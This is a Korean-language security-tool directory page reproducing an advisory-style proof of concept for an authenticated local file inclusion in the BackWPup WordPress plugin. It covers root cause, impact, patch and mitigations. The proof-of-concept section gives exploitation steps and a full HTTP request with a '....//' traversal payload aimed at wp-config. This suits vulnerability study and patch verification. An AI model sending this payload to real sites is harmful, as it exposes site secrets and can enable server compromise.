Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-6227 — # CVE-2026-6227 교육용 개념 증명 BackWPup WordPress 플러그인의 인증된 로컬 파일 포함(Local File Inclusion) 취약점에 대한 교육용 개념 증명으로, 근본 원인 분석, 익스플로잇 요청, 완화 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/pixel-defaultbr/cve-2026-6227
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

# CVE-2026-6227 교육용 개념 증명 BackWPup WordPress 플러그인의 인증된 로컬 파일 포함(Local File Inclusion) 취약점에 대한 교육용 개념 증명으로, 근본 원인 분석, 익스플로잇 요청, 완화 지침을 포함합니다.

저장소 보기
15개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-6227: BackWPup의 로컬 파일 포함(Local File Inclusion) 취약점

CVSS Version Researcher

권고 요약

BackWPup 5.6.6 이하 버전은 /wp-json/backwpup/v1/getblock REST 엔드포인트의 block_name 파라미터를 통해 인증된 로컬 파일 포함(LFI) 취약점의 영향을 받습니다.

이 결함은 순회 시퀀스에 대한 비재귀적 str_replace() 샌니타이징으로 인해 발생했으며, 5.6.7 버전에서 이미 수정되었습니다.

메타데이터

  • CVE: CVE-2026-6227
  • 심각도: 높음(High)
  • CVSS 점수: 7.2
  • 영향 제품: BackWPup WordPress 플러그인
  • 영향 버전: <= 5.6.6
  • 수정 버전: 5.6.7
  • 상태: 패치됨
  • 공개 날짜: 2026-04-13
  • 연구자: Pixel_DefaultBR

면책 조항

이 저장소는 교육 및 윤리적 보안 연구 목적으로만 제공됩니다. 여기에 제공된 정보는 관리자와 보안 팀이 시스템을 검증하는 데 도움을 주기 위한 것입니다. 명시적인 서면 허가 없이 대상을 공격하는 데 사용하지 마십시오.

영향 범위

  • 함수: BackWPupHelpers::component()
  • 엔드포인트: POST /wp-json/backwpup/v1/getblock
  • 파라미터: block_name
  • 접근 수준: 인증된 관리자(또는 백업 권한이 위임된 사용자)

근본 원인 분석

취약한 컴포넌트 로더는 include()를 호출하기 전에 비재귀적 str_replace() 샌니타이징을 적용합니다. 이는 ....// 또는 ..././와 같은 조작된 순회 패턴을 사용하여 우회할 수 있으며, 공격자가 제어하는 경로 해석을 허용합니다.

영향

  • 서버 파일 시스템에서 임의의 로컬 PHP 파일 포함
  • 잠재적인 민감 데이터 노출(예: wp-config.php)
  • 특정 서버/애플리케이션 구성에서 원격 코드 실행 가능성

기본적으로 악용에는 관리자 수준의 접근 권한이 필요합니다. 백업 권한이 위임된 경우, 낮은 권한의 사용자도 이 문제를 악용할 수 있게 됩니다.

악용 전제 조건

  • 유효한 인증된 WordPress 세션
  • 유효한 REST nonce
  • 관리자 권한 또는 위임된 백업 권한

개념 증명

시나리오: 로컬 파일 포함

  1. BackWPup 작업 권한이 있는 계정으로 WordPress에 로그인합니다.
  2. 플러그인 UI에서 정상적인 요청을 트리거하고 프록시로 트래픽을 가로챕니다.
  3. /wp-json/backwpup/v1/getblock에 대한 정상적인 POST 요청을 찾습니다.
  4. block_name을 순회 페이로드로 교체합니다.

요청 예시:

root@kitploit:~
POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>

block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
  1. 응답을 관찰하여 파일 포함 동작을 확인합니다.

타임라인

  • 2026-03: 공급업체에 취약점 보고
  • 2026-03-25: 5.6.7에서 공급업체 패치 릴리스
  • 2026-04-13: 공개 공개(CVE-2026-6227)

완화 조치

  • BackWPup을 5.6.7 이상 버전으로 업데이트
  • backwpup 권한 할당을 신뢰할 수 있는 역할로만 제한
  • /wp-json/backwpup/v1/getblock에 대한 의심스러운 접근을 감사 로그에서 검토

참고 자료

  • 공급업체 플러그인 페이지: https://wordpress.org/plugins/backwpup/
  • CVE 참조(Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
도구 다운로드